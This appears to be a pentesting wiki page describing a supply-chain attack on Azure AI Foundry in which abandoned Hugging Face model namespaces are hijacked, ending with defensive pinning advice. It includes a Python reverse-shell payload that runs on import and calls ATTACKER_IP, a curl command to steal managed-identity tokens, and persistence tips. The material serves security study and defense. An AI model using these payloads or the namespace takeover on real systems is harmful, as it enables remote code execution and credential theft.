Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse

Reading time: 5 minutes

Scenario

• Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment.
• HF model identifiers are Author/ModelName. If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path.
• Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions.

Common HF takeover cases:

• Ownership deletion: Old path 404 until takeover.
• Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path.

Identifying Reusable Namespaces (HF)

# Check author/org existence
curl -I https://huggingface.co/<Author>        # 200 exists, 404 deleted/available

# Check model path
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 -> redirect (transfer case), 404 -> deleted until takeover

End-to-end Attack Flow against Azure AI Foundry

1. In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF.
2. Re-register the abandoned author on HF and recreate the ModelName.
3. Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True.
4. Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions.

Example payload fragment executed on import (for demonstration only):

# __init__.py or a module imported by the model loader
import os, socket, subprocess, threading

def _rs(host, port):
    s = socket.socket(); s.connect((host, port))
    for fd in (0,1,2):
        try:
            os.dup2(s.fileno(), fd)
        except Exception:
            pass
    subprocess.call(["/bin/sh","-i"])  # or powershell on Windows images

if os.environ.get("AZUREML_ENDPOINT","1") == "1":
    threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()

Notes

• AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True.
• Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure.

Post-Exploitation Tips (Azure Endpoint)

• Enumerate environment variables and MSI endpoints for tokens:

# Azure Instance Metadata Service (inside Azure compute)
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

• Check mounted storage, model artifacts, and reachable Azure services with the acquired token.
• Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF.

Defensive Guidance for Azure AI Foundry Users

• Pin models by commit when loading from HF:

from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")

• Mirror vetted HF models to a trusted internal registry and deploy from there.
• Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin.
• Validate author existence and model provenance prior to deployment.

Recognition Heuristics (HTTP)

• Deleted author: author page 404; legacy model path 404 until takeover.
• Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content.

curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"

Cross-References

• See broader methodology and supply-chain notes:

Pentesting Cloud Methodology

References

• Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)
• Hugging Face: Renaming or transferring a repo